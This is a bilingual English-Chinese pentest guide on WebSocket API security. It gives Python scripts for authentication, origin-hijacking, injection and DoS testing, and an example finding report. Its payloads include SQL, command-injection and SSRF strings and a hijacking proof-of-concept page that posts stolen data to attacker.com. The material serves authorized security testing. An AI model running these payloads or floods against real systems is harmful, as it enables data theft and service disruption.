testing-websocket-api-security

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Testing WebSocket API Security

WebSocket API安全测试

When to Use

使用场景

  • Assessing real-time communication APIs that use WebSocket (ws://) or Secure WebSocket (wss://) protocols
  • Testing for Cross-Site WebSocket Hijacking (CSWSH) where an attacker's page connects to a legitimate WebSocket server
  • Evaluating authentication and authorization enforcement on WebSocket connections and messages
  • Testing input validation on WebSocket message payloads for injection vulnerabilities
  • Assessing WebSocket implementations for denial-of-service through message flooding or oversized frames
Do not use without written authorization. WebSocket testing may disrupt real-time services and affect other connected users.
  • 评估使用WebSocket(ws://)或安全WebSocket(wss://)协议的实时通信API
  • 测试跨站WebSocket劫持(CSWSH),即攻击者的页面连接到合法WebSocket服务器的场景
  • 评估WebSocket连接和消息上的身份验证与授权执行情况
  • 测试WebSocket消息负载的输入验证,排查注入漏洞
  • 评估WebSocket实现是否存在通过消息泛洪或超大帧导致的拒绝服务风险
未经书面授权请勿使用。WebSocket测试可能会中断实时服务,影响其他连接用户。

Prerequisites

前置条件

  • Written authorization specifying the WebSocket endpoint and testing scope
  • Burp Suite Professional with WebSocket interception capability
  • Python 3.10+ with
    websockets
    and
    asyncio
    libraries
  • Browser developer tools for observing WebSocket handshakes and frames
  • wscat CLI tool for manual WebSocket interaction:
    npm install -g wscat
  • Knowledge of the WebSocket subprotocol in use (JSON-RPC, STOMP, custom)
  • 明确WebSocket端点和测试范围的书面授权
  • 具备WebSocket拦截功能的Burp Suite Professional
  • 安装了
    websockets
    asyncio
    库的Python 3.10+环境
  • 用于观察WebSocket握手和帧的浏览器开发者工具
  • 用于手动WebSocket交互的wscat CLI工具:
    npm install -g wscat
  • 了解当前使用的WebSocket子协议(JSON-RPC、STOMP或自定义协议)

Workflow

测试流程

Step 1: WebSocket Endpoint Discovery and Handshake Analysis

步骤1:WebSocket端点发现与握手分析

python
import asyncio
import websockets
import json
import ssl
import time

WS_URL = "wss://target-api.example.com/ws"
AUTH_TOKEN = "Bearer <token>"
python
import asyncio
import websockets
import json
import ssl
import time

WS_URL = "wss://target-api.example.com/ws"
AUTH_TOKEN = "Bearer <token>"

Capture and analyze the WebSocket handshake

Capture and analyze the WebSocket handshake

async def analyze_handshake(): """Analyze WebSocket upgrade request and response headers.""" try: async with websockets.connect( WS_URL, extra_headers={"Authorization": AUTH_TOKEN}, ssl=ssl.create_default_context() ) as ws: print(f"Connected to: {WS_URL}") print(f"Protocol: {ws.subprotocol}") print(f"Extensions: {ws.extensions}")
        # Send a test message
        test_msg = json.dumps({"type": "ping"})
        await ws.send(test_msg)
        response = await asyncio.wait_for(ws.recv(), timeout=5)
        print(f"Server response: {response}")

        return True
except websockets.exceptions.InvalidStatusCode as e:
    print(f"Connection rejected: {e.status_code}")
    return False
except Exception as e:
    print(f"Connection error: {e}")
    return False
asyncio.run(analyze_handshake())
undefined
async def analyze_handshake(): """Analyze WebSocket upgrade request and response headers.""" try: async with websockets.connect( WS_URL, extra_headers={"Authorization": AUTH_TOKEN}, ssl=ssl.create_default_context() ) as ws: print(f"Connected to: {WS_URL}") print(f"Protocol: {ws.subprotocol}") print(f"Extensions: {ws.extensions}")
        # Send a test message
        test_msg = json.dumps({"type": "ping"})
        await ws.send(test_msg)
        response = await asyncio.wait_for(ws.recv(), timeout=5)
        print(f"Server response: {response}")

        return True
except websockets.exceptions.InvalidStatusCode as e:
    print(f"Connection rejected: {e.status_code}")
    return False
except Exception as e:
    print(f"Connection error: {e}")
    return False
asyncio.run(analyze_handshake())
undefined

Step 2: Authentication and Authorization Testing

步骤2:身份验证与授权测试

python
async def test_ws_authentication():
    """Test if WebSocket requires authentication."""
    results = []

    # Test 1: Connect without any authentication
    try:
        async with websockets.connect(WS_URL) as ws:
            await ws.send(json.dumps({"type": "get_user_data"}))
            resp = await asyncio.wait_for(ws.recv(), timeout=5)
            results.append({
                "test": "No authentication",
                "status": "VULNERABLE",
                "response": resp[:200]
            })
            print(f"[VULN] WebSocket accessible without authentication")
    except websockets.exceptions.InvalidStatusCode:
        results.append({"test": "No authentication", "status": "SECURE"})
    except Exception as e:
        results.append({"test": "No authentication", "status": f"ERROR: {e}"})

    # Test 2: Connect with invalid token
    try:
        async with websockets.connect(WS_URL,
            extra_headers={"Authorization": "Bearer invalid_token"}) as ws:
            await ws.send(json.dumps({"type": "get_user_data"}))
            resp = await asyncio.wait_for(ws.recv(), timeout=5)
            results.append({
                "test": "Invalid token",
                "status": "VULNERABLE",
                "response": resp[:200]
            })
    except websockets.exceptions.InvalidStatusCode:
        results.append({"test": "Invalid token", "status": "SECURE"})
    except Exception as e:
        results.append({"test": "Invalid token", "status": f"ERROR: {e}"})

    # Test 3: Connect with expired token
    expired_token = "Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MDAwMDAwMDB9.expired"
    try:
        async with websockets.connect(WS_URL,
            extra_headers={"Authorization": expired_token}) as ws:
            await ws.send(json.dumps({"type": "get_user_data"}))
            resp = await asyncio.wait_for(ws.recv(), timeout=5)
            results.append({"test": "Expired token", "status": "VULNERABLE"})
    except (websockets.exceptions.InvalidStatusCode, Exception):
        results.append({"test": "Expired token", "status": "SECURE"})

    # Test 4: Token in query parameter (leakage risk)
    try:
        async with websockets.connect(f"{WS_URL}?token={AUTH_TOKEN}") as ws:
            await ws.send(json.dumps({"type": "ping"}))
            resp = await asyncio.wait_for(ws.recv(), timeout=5)
            results.append({
                "test": "Token in URL",
                "status": "INFO - Token accepted in query parameter (may leak in logs)"
            })
    except Exception:
        results.append({"test": "Token in URL", "status": "REJECTED"})

    for r in results:
        print(f"  [{r['status'][:10]}] {r['test']}")

    return results

asyncio.run(test_ws_authentication())
python
async def test_ws_authentication():
    """Test if WebSocket requires authentication."""
    results = []

    # Test 1: Connect without any authentication
    try:
        async with websockets.connect(WS_URL) as ws:
            await ws.send(json.dumps({"type": "get_user_data"}))
            resp = await asyncio.wait_for(ws.recv(), timeout=5)
            results.append({
                "test": "No authentication",
                "status": "VULNERABLE",
                "response": resp[:200]
            })
            print(f"[VULN] WebSocket accessible without authentication")
    except websockets.exceptions.InvalidStatusCode:
        results.append({"test": "No authentication", "status": "SECURE"})
    except Exception as e:
        results.append({"test": "No authentication", "status": f"ERROR: {e}"})

    # Test 2: Connect with invalid token
    try:
        async with websockets.connect(WS_URL,
            extra_headers={"Authorization": "Bearer invalid_token"}) as ws:
            await ws.send(json.dumps({"type": "get_user_data"}))
            resp = await asyncio.wait_for(ws.recv(), timeout=5)
            results.append({
                "test": "Invalid token",
                "status": "VULNERABLE",
                "response": resp[:200]
            })
    except websockets.exceptions.InvalidStatusCode:
        results.append({"test": "Invalid token", "status": "SECURE"})
    except Exception as e:
        results.append({"test": "Invalid token", "status": f"ERROR: {e}"})

    # Test 3: Connect with expired token
    expired_token = "Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MDAwMDAwMDB9.expired"
    try:
        async with websockets.connect(WS_URL,
            extra_headers={"Authorization": expired_token}) as ws:
            await ws.send(json.dumps({"type": "get_user_data"}))
            resp = await asyncio.wait_for(ws.recv(), timeout=5)
            results.append({
                "test": "Expired token",
                "status": "VULNERABLE"
            })
    except (websockets.exceptions.InvalidStatusCode, Exception):
        results.append({"test": "Expired token", "status": "SECURE"})

    # Test 4: Token in query parameter (leakage risk)
    try:
        async with websockets.connect(f"{WS_URL}?token={AUTH_TOKEN}") as ws:
            await ws.send(json.dumps({"type": "ping"}))
            resp = await asyncio.wait_for(ws.recv(), timeout=5)
            results.append({
                "test": "Token in URL",
                "status": "INFO - Token accepted in query parameter (may leak in logs)"
            })
    except Exception:
        results.append({"test": "Token in URL", "status": "REJECTED"})

    for r in results:
        print(f"  [{r['status'][:10]}] {r['test']}")

    return results

asyncio.run(test_ws_authentication())

Step 3: Cross-Site WebSocket Hijacking (CSWSH) Testing

步骤3:跨站WebSocket劫持(CSWSH)测试

python
async def test_cswsh():
    """Test for Cross-Site WebSocket Hijacking vulnerability."""
    # CSWSH occurs when the WebSocket server does not validate the Origin header
    # An attacker's website can connect to the legitimate WebSocket and steal data

    origins_to_test = [
        None,                                    # No Origin header
        "https://evil.com",                      # Attacker domain
        "https://target-api.example.com.evil.com",  # Subdomain confusion
        "null",                                  # Null origin (sandboxed iframe)
        "https://target-api.example.com",        # Legitimate origin
        "http://target-api.example.com",         # HTTP downgrade
    ]

    print("=== CSWSH Testing ===\n")
    for origin in origins_to_test:
        try:
            headers = {"Authorization": AUTH_TOKEN}
            if origin:
                headers["Origin"] = origin

            async with websockets.connect(WS_URL, extra_headers=headers) as ws:
                # Try to receive data that should be restricted
                await ws.send(json.dumps({"type": "get_messages"}))
                resp = await asyncio.wait_for(ws.recv(), timeout=5)

                if origin and origin != "https://target-api.example.com":
                    print(f"[CSWSH] Origin '{origin}' -> ACCEPTED (data received)")
                else:
                    print(f"[OK] Origin '{origin}' -> Accepted (legitimate)")
        except websockets.exceptions.InvalidStatusCode as e:
            print(f"[BLOCKED] Origin '{origin}' -> Rejected ({e.status_code})")
        except Exception as e:
            print(f"[ERROR] Origin '{origin}' -> {e}")

asyncio.run(test_cswsh())
python
async def test_cswsh():
    """Test for Cross-Site WebSocket Hijacking vulnerability."""
    # CSWSH occurs when the WebSocket server does not validate the Origin header
    # An attacker's website can connect to the legitimate WebSocket and steal data

    origins_to_test = [
        None,                                    # No Origin header
        "https://evil.com",                      # Attacker domain
        "https://target-api.example.com.evil.com",  # Subdomain confusion
        "null",                                  # Null origin (sandboxed iframe)
        "https://target-api.example.com",        # Legitimate origin
        "http://target-api.example.com",         # HTTP downgrade
    ]

    print("=== CSWSH Testing ===\n")
    for origin in origins_to_test:
        try:
            headers = {"Authorization": AUTH_TOKEN}
            if origin:
                headers["Origin"] = origin

            async with websockets.connect(WS_URL, extra_headers=headers) as ws:
                # Try to receive data that should be restricted
                await ws.send(json.dumps({"type": "get_messages"}))
                resp = await asyncio.wait_for(ws.recv(), timeout=5)

                if origin and origin != "https://target-api.example.com":
                    print(f"[CSWSH] Origin '{origin}' -> ACCEPTED (data received)")
                else:
                    print(f"[OK] Origin '{origin}' -> Accepted (legitimate)")
        except websockets.exceptions.InvalidStatusCode as e:
            print(f"[BLOCKED] Origin '{origin}' -> Rejected ({e.status_code})")
        except Exception as e:
            print(f"[ERROR] Origin '{origin}' -> {e}")

asyncio.run(test_cswsh())

PoC HTML page for CSWSH exploitation

PoC HTML page for CSWSH exploitation

CSWSH_POC = """
<!DOCTYPE html> <html> <head><title>CSWSH PoC</title></head> <body> <script> // This page, hosted on attacker.com, connects to the target WebSocket // If the server doesn't validate Origin, the victim's browser will // send cookies/credentials and the attacker receives the data
var ws = new WebSocket("wss://target-api.example.com/ws");
ws.onopen = function() { console.log("Connected to target WebSocket"); ws.send(JSON.stringify({type: "get_messages"})); ws.send(JSON.stringify({type: "get_user_data"})); };
ws.onmessage = function(event) { console.log("Stolen data:", event.data); // Exfiltrate to attacker server fetch("https://attacker.com/collect", { method: "POST", body: event.data }); }; </script>
<p>Loading... (CSWSH attack in progress)</p> </body> </html> """ ```
CSWSH_POC = """
<!DOCTYPE html> <html> <head><title>CSWSH PoC</title></head> <body> <script> // This page, hosted on attacker.com, connects to the target WebSocket // If the server doesn't validate Origin, the victim's browser will // send cookies/credentials and the attacker receives the data
var ws = new WebSocket("wss://target-api.example.com/ws");
ws.onopen = function() { console.log("Connected to target WebSocket"); ws.send(JSON.stringify({type: "get_messages"})); ws.send(JSON.stringify({type: "get_user_data"})); };
ws.onmessage = function(event) { console.log("Stolen data:", event.data); // Exfiltrate to attacker server fetch("https://attacker.com/collect", { method: "POST", body: event.data }); }; </script>
<p>Loading... (CSWSH attack in progress)</p> </body> </html> """ ```

Step 4: WebSocket Message Injection Testing

步骤4:WebSocket消息注入测试

python
async def test_ws_injection():
    """Test WebSocket messages for injection vulnerabilities."""

    INJECTION_PAYLOADS = {
        "sql": [
            {"type": "search", "query": "' OR '1'='1"},
            {"type": "search", "query": "'; DROP TABLE messages;--"},
            {"type": "get_message", "id": "1 UNION SELECT username,password FROM users--"},
        ],
        "nosql": [
            {"type": "search", "query": {"$ne": ""}},
            {"type": "get_user", "filter": {"$gt": ""}},
        ],
        "xss": [
            {"type": "send_message", "content": "<script>alert('xss')</script>"},
            {"type": "send_message", "content": "<img src=x onerror=alert(1)>"},
            {"type": "update_name", "name": "Test<script>document.location='https://evil.com'</script>"},
        ],
        "command": [
            {"type": "process", "file": "test; cat /etc/passwd"},
            {"type": "convert", "input": "test | id"},
        ],
        "ssrf": [
            {"type": "load_url", "url": "http://169.254.169.254/latest/meta-data/"},
            {"type": "webhook", "callback": "http://localhost:6379/"},
        ],
        "overflow": [
            {"type": "send_message", "content": "A" * 100000},
            {"type": "search", "query": "B" * 1000000},
        ],
    }

    async with websockets.connect(WS_URL,
        extra_headers={"Authorization": AUTH_TOKEN}) as ws:

        for category, payloads in INJECTION_PAYLOADS.items():
            for payload in payloads:
                try:
                    await ws.send(json.dumps(payload))
                    resp = await asyncio.wait_for(ws.recv(), timeout=5)

                    # Analyze response for injection indicators
                    resp_lower = resp.lower()
                    indicators = []
                    if any(kw in resp_lower for kw in ["sql", "syntax", "mysql", "postgresql"]):
                        indicators.append("SQL error")
                    if any(kw in resp_lower for kw in ["root:", "uid=", "etc/passwd"]):
                        indicators.append("Command output")
                    if any(kw in resp_lower for kw in ["ami-id", "instance-id", "metadata"]):
                        indicators.append("SSRF data")
                    if "script" in resp_lower and "xss" not in category:
                        indicators.append("Reflected XSS")

                    if indicators:
                        print(f"[{category.upper()}] {json.dumps(payload)[:60]} -> {indicators}")
                    elif len(resp) > 10000:
                        print(f"[OVERFLOW] Large response: {len(resp)} bytes")
                except asyncio.TimeoutError:
                    pass
                except websockets.exceptions.ConnectionClosed:
                    print(f"[CRASH] Connection closed after {category} payload")
                    # Reconnect
                    break

asyncio.run(test_ws_injection())
python
async def test_ws_injection():
    """Test WebSocket messages for injection vulnerabilities."""

    INJECTION_PAYLOADS = {
        "sql": [
            {"type": "search", "query": "' OR '1'='1"},
            {"type": "search", "query": "'; DROP TABLE messages;--"},
            {"type": "get_message", "id": "1 UNION SELECT username,password FROM users--"},
        ],
        "nosql": [
            {"type": "search", "query": {"$ne": ""}},
            {"type": "get_user", "filter": {"$gt": ""}},
        ],
        "xss": [
            {"type": "send_message", "content": "<script>alert('xss')</script>"},
            {"type": "send_message", "content": "<img src=x onerror=alert(1)>"},
            {"type": "update_name", "name": "Test<script>document.location='https://evil.com'</script>"},
        ],
        "command": [
            {"type": "process", "file": "test; cat /etc/passwd"},
            {"type": "convert", "input": "test | id"},
        ],
        "ssrf": [
            {"type": "load_url", "url": "http://169.254.169.254/latest/meta-data/"},
            {"type": "webhook", "callback": "http://localhost:6379/"},
        ],
        "overflow": [
            {"type": "send_message", "content": "A" * 100000},
            {"type": "search", "query": "B" * 1000000},
        ],
    }

    async with websockets.connect(WS_URL,
        extra_headers={"Authorization": AUTH_TOKEN}) as ws:

        for category, payloads in INJECTION_PAYLOADS.items():
            for payload in payloads:
                try:
                    await ws.send(json.dumps(payload))
                    resp = await asyncio.wait_for(ws.recv(), timeout=5)

                    # Analyze response for injection indicators
                    resp_lower = resp.lower()
                    indicators = []
                    if any(kw in resp_lower for kw in ["sql", "syntax", "mysql", "postgresql"]):
                        indicators.append("SQL error")
                    if any(kw in resp_lower for kw in ["root:", "uid=", "etc/passwd"]):
                        indicators.append("Command output")
                    if any(kw in resp_lower for kw in ["ami-id", "instance-id", "metadata"]):
                        indicators.append("SSRF data")
                    if "script" in resp_lower and "xss" not in category:
                        indicators.append("Reflected XSS")

                    if indicators:
                        print(f"[{category.upper()}] {json.dumps(payload)[:60]} -> {indicators}")
                    elif len(resp) > 10000:
                        print(f"[OVERFLOW] Large response: {len(resp)} bytes")
                except asyncio.TimeoutError:
                    pass
                except websockets.exceptions.ConnectionClosed:
                    print(f"[CRASH] Connection closed after {category} payload")
                    # Reconnect
                    break

asyncio.run(test_ws_injection())

Step 5: Denial-of-Service Testing

步骤5:拒绝服务测试

python
async def test_ws_dos():
    """Test WebSocket for DoS vulnerabilities."""
    print("=== WebSocket DoS Testing ===\n")

    # Test 1: Message flooding
    async def flood_test():
        async with websockets.connect(WS_URL,
            extra_headers={"Authorization": AUTH_TOKEN}) as ws:
            count = 0
            start = time.time()
            for i in range(10000):
                try:
                    await ws.send(json.dumps({"type": "ping", "id": i}))
                    count += 1
                except websockets.exceptions.ConnectionClosed:
                    break
            elapsed = time.time() - start
            print(f"  Flood test: {count} messages in {elapsed:.1f}s ({count/elapsed:.0f} msg/s)")

    await flood_test()

    # Test 2: Large message
    async def large_message_test():
        sizes = [1024, 10240, 102400, 1024000, 10240000]  # 1KB to 10MB
        async with websockets.connect(WS_URL,
            extra_headers={"Authorization": AUTH_TOKEN},
            max_size=20*1024*1024) as ws:
            for size in sizes:
                try:
                    large_msg = json.dumps({"type": "data", "payload": "A" * size})
                    await ws.send(large_msg)
                    resp = await asyncio.wait_for(ws.recv(), timeout=5)
                    print(f"  Large message ({size} bytes): Accepted")
                except (websockets.exceptions.ConnectionClosed, asyncio.TimeoutError) as e:
                    print(f"  Large message ({size} bytes): Rejected/Disconnected")
                    break

    await large_message_test()

    # Test 3: Connection exhaustion
    async def connection_exhaustion():
        connections = []
        for i in range(100):
            try:
                ws = await websockets.connect(WS_URL,
                    extra_headers={"Authorization": AUTH_TOKEN})
                connections.append(ws)
            except Exception:
                break
        print(f"  Connection exhaustion: {len(connections)} concurrent connections established")
        for ws in connections:
            await ws.close()

    await connection_exhaustion()

asyncio.run(test_ws_dos())
python
async def test_ws_dos():
    """Test WebSocket for DoS vulnerabilities."""
    print("=== WebSocket DoS Testing ===\n")

    # Test 1: Message flooding
    async def flood_test():
        async with websockets.connect(WS_URL,
            extra_headers={"Authorization": AUTH_TOKEN}) as ws:
            count = 0
            start = time.time()
            for i in range(10000):
                try:
                    await ws.send(json.dumps({"type": "ping", "id": i}))
                    count += 1
                except websockets.exceptions.ConnectionClosed:
                    break
            elapsed = time.time() - start
            print(f"  Flood test: {count} messages in {elapsed:.1f}s ({count/elapsed:.0f} msg/s)")

    await flood_test()

    # Test 2: Large message
    async def large_message_test():
        sizes = [1024, 10240, 102400, 1024000, 10240000]  # 1KB to 10MB
        async with websockets.connect(WS_URL,
            extra_headers={"Authorization": AUTH_TOKEN},
            max_size=20*1024*1024) as ws:
            for size in sizes:
                try:
                    large_msg = json.dumps({"type": "data", "payload": "A" * size})
                    await ws.send(large_msg)
                    resp = await asyncio.wait_for(ws.recv(), timeout=5)
                    print(f"  Large message ({size} bytes): Accepted")
                except (websockets.exceptions.ConnectionClosed, asyncio.TimeoutError) as e:
                    print(f"  Large message ({size} bytes): Rejected/Disconnected")
                    break

    await large_message_test()

    # Test 3: Connection exhaustion
    async def connection_exhaustion():
        connections = []
        for i in range(100):
            try:
                ws = await websockets.connect(WS_URL,
                    extra_headers={"Authorization": AUTH_TOKEN})
                connections.append(ws)
            except Exception:
                break
        print(f"  Connection exhaustion: {len(connections)} concurrent connections established")
        for ws in connections:
            await ws.close()

    await connection_exhaustion()

asyncio.run(test_ws_dos())

Key Concepts

核心概念

TermDefinition
WebSocketFull-duplex communication protocol over a single TCP connection, established via HTTP upgrade handshake
CSWSHCross-Site WebSocket Hijacking - an attack where a malicious website initiates a WebSocket connection to a legitimate server using the victim's browser credentials
Origin ValidationServer-side check of the Origin header during WebSocket handshake to prevent CSWSH by rejecting connections from unauthorized domains
WebSocket FrameThe basic unit of data in WebSocket communication, containing opcode, masking, payload length, and payload data
Upgrade HandshakeHTTP request with
Upgrade: websocket
and
Connection: Upgrade
headers that establishes the WebSocket connection
Message FloodingSending a large volume of WebSocket messages to exhaust server resources (memory, CPU, bandwidth)
术语定义
WebSocket基于单个TCP连接的全双工通信协议,通过HTTP升级握手建立连接
CSWSH跨站WebSocket劫持——攻击者的网站利用受害者浏览器的凭证,向合法服务器发起WebSocket连接的攻击
Origin验证WebSocket握手期间服务器端对Origin头的检查,通过拒绝来自未授权域名的连接来防范CSWSH
WebSocket帧WebSocket通信中的基本数据单元,包含操作码、掩码、负载长度和负载数据
升级握手包含
Upgrade: websocket
Connection: Upgrade
头的HTTP请求,用于建立WebSocket连接
消息泛洪发送大量WebSocket消息以耗尽服务器资源(内存、CPU、带宽)

Tools & Systems

工具与系统

  • Burp Suite Professional: Intercepts WebSocket handshakes and messages, allows message modification and replay
  • OWASP ZAP: WebSocket testing with message fuzzing, interception, and breakpoint capabilities
  • wscat: Command-line WebSocket client for manual testing:
    wscat -c wss://target.com/ws -H "Authorization: Bearer token"
  • websocat: Advanced CLI WebSocket tool with proxy, broadcast, and scripting capabilities
  • Autobahn TestSuite: Comprehensive WebSocket protocol compliance and security testing framework
  • Burp Suite Professional:拦截WebSocket握手和消息,支持消息修改与重放
  • OWASP ZAP:具备消息模糊测试、拦截和断点功能的WebSocket测试工具
  • wscat:用于手动测试的命令行WebSocket客户端:
    wscat -c wss://target.com/ws -H "Authorization: Bearer token"
  • websocat:具备代理、广播和脚本功能的高级CLI WebSocket工具
  • Autobahn TestSuite:全面的WebSocket协议合规性与安全测试框架

Common Scenarios

常见场景

Scenario: Chat Application WebSocket Security Assessment

场景:聊天应用WebSocket安全评估

Context: A messaging application uses WebSocket for real-time chat. The WebSocket endpoint handles message delivery, typing indicators, read receipts, and user presence. Authentication is cookie-based.
Approach:
  1. Analyze the WebSocket handshake: connection established at
    wss://chat.example.com/ws
    with session cookie authentication
  2. Test CSWSH: WebSocket server does not validate the Origin header - an attacker's page can connect and receive the victim's messages
  3. Test authentication: WebSocket accepts connections with expired session cookies (session validation only at handshake, not for subsequent messages)
  4. Test authorization: User A can send messages to private channels they are not a member of by crafting the channel ID
  5. Test injection: Message content is stored without sanitization; XSS payload in message body executes in other users' browsers
  6. Test message flooding: Server accepts 5000 messages per second without rate limiting, causing CPU spike
  7. Find that WebSocket messages include the sender's internal user ID, email, and IP address (information leakage)
Pitfalls:
  • Not testing CSWSH because the application uses token-based authentication (cookies are automatically sent with WebSocket)
  • Only testing the initial handshake authentication without verifying ongoing message authorization
  • Missing injection vulnerabilities because payloads are in JSON WebSocket frames instead of HTTP parameters
  • Not testing reconnection behavior (does the server re-validate authentication on reconnect?)
  • Ignoring that WebSocket connections may bypass HTTP-level rate limiting and WAF rules
背景:一款消息应用使用WebSocket实现实时聊天。WebSocket端点处理消息传递、输入指示器、已读回执和用户在线状态。身份验证基于Cookie。
测试方法
  1. 分析WebSocket握手:连接建立在
    wss://chat.example.com/ws
    ,使用会话Cookie进行身份验证
  2. 测试CSWSH:WebSocket服务器未验证Origin头——攻击者的页面可连接并接收受害者的消息
  3. 测试身份验证:WebSocket接受过期会话Cookie的连接(仅在握手时验证会话,后续消息不验证)
  4. 测试授权:用户A可通过构造频道ID,向其未加入的私有频道发送消息
  5. 测试注入:消息内容未经过滤就存储;消息体中的XSS负载会在其他用户的浏览器中执行
  6. 测试消息泛洪:服务器在无速率限制的情况下每秒接受5000条消息,导致CPU飙升
  7. 发现WebSocket消息包含发送者的内部用户ID、邮箱和IP地址(信息泄露)
常见误区
  • 因为应用使用基于令牌的身份验证而不测试CSWSH(Cookie会随WebSocket自动发送)
  • 仅测试初始握手的身份验证,未验证后续消息的授权
  • 忽略注入漏洞,因为负载在JSON WebSocket帧中而非HTTP参数里
  • 未测试重连行为(服务器在重连时是否重新验证身份?)
  • 忽略WebSocket连接可能绕过HTTP层面的速率限制和WAF规则

Output Format

输出格式

undefined
undefined

Finding: Cross-Site WebSocket Hijacking Enables Real-Time Data Theft

发现:跨站WebSocket劫持可实现实时数据窃取

ID: API-WS-001 Severity: High (CVSS 8.1) Affected Endpoint: wss://chat.example.com/ws
Description: The WebSocket server does not validate the Origin header during the handshake. An attacker can host a malicious web page that opens a WebSocket connection to the chat server using the victim's session cookie. All messages, typing indicators, and presence data are forwarded to the attacker in real time.
Proof of Concept: Host the CSWSH PoC page on attacker.com. When a logged-in user visits the page, the JavaScript establishes a WebSocket connection to the chat server. The server authenticates the connection using the victim's cookie and delivers all real-time chat data to the attacker's connection.
Impact: Real-time interception of all private messages, presence data, and typing indicators for any user who visits the attacker's page.
Remediation:
  1. Validate the Origin header against an allowlist of legitimate domains
  2. Implement CSRF tokens in the WebSocket handshake URL
  3. Use token-based authentication (Authorization header) instead of cookies for WebSocket
  4. Implement per-message authorization checks, not just connection-level authentication
  5. Add rate limiting on WebSocket message volume per connection
undefined
ID:API-WS-001 严重程度:高(CVSS 8.1) 受影响端点:wss://chat.example.com/ws
描述: WebSocket服务器在握手期间未验证Origin头。攻击者可托管恶意网页,利用受害者的会话Cookie打开与聊天服务器的WebSocket连接。所有消息、输入指示器和在线状态数据都会实时转发给攻击者。
验证证明: 在attacker.com托管CSWSH PoC页面。当已登录用户访问该页面时,JavaScript会建立与聊天服务器的WebSocket连接。服务器使用受害者的Cookie对连接进行身份验证,并将所有实时聊天数据发送给攻击者的连接。
影响: 任何访问攻击者页面的用户,其所有私人消息、在线状态数据和输入指示器都会被实时拦截。
修复建议
  1. 根据合法域名允许列表验证Origin头
  2. 在WebSocket握手URL中实现CSRF令牌
  3. 使用基于令牌的身份验证(Authorization头)替代Cookie进行WebSocket验证
  4. 实现每条消息的授权检查,而非仅连接层面的身份验证
  5. 为每个连接的WebSocket消息量添加速率限制
undefined